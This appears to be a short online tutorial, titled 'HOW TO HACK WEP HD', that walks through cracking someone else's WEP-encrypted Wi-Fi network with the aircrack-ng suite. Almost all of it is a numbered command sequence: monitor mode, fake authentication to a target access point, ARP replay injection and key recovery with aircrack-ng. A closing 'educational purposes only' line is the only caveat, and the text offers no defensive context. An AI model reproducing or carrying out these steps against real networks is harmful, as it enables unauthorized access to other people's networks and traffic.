HOW TO HACK WEP HD
This is how easy it is to hack someones WEP encrypted network. 1. airmon-ng 2.airmon-ng start wlan0 (wlan0 is my wireless interface ) 3.airodump-ng mon0 (mon0 is my wireless interface in monitor mode) 4. airodump-ng --channel 6 mon0 ( channel 6 is the channel of the essid i want to hack) 5. aireplay-ng --fakeauth 0 -a bssid -e essid mon0 (fill in for bssid and essid ) 6. airodump-ng -c 6 -w /tmp/hacked -i mon0 * when you run this process stop the other airodump process which is #4. put any name for hacked 7. aireplay-ng -3 -b bssid mon0 8.aircrack-ng -0 -b bssid /tmp/hacked-01.ivs WARNING!!! FOR EDUCATIONAL PURPOSES ONLY!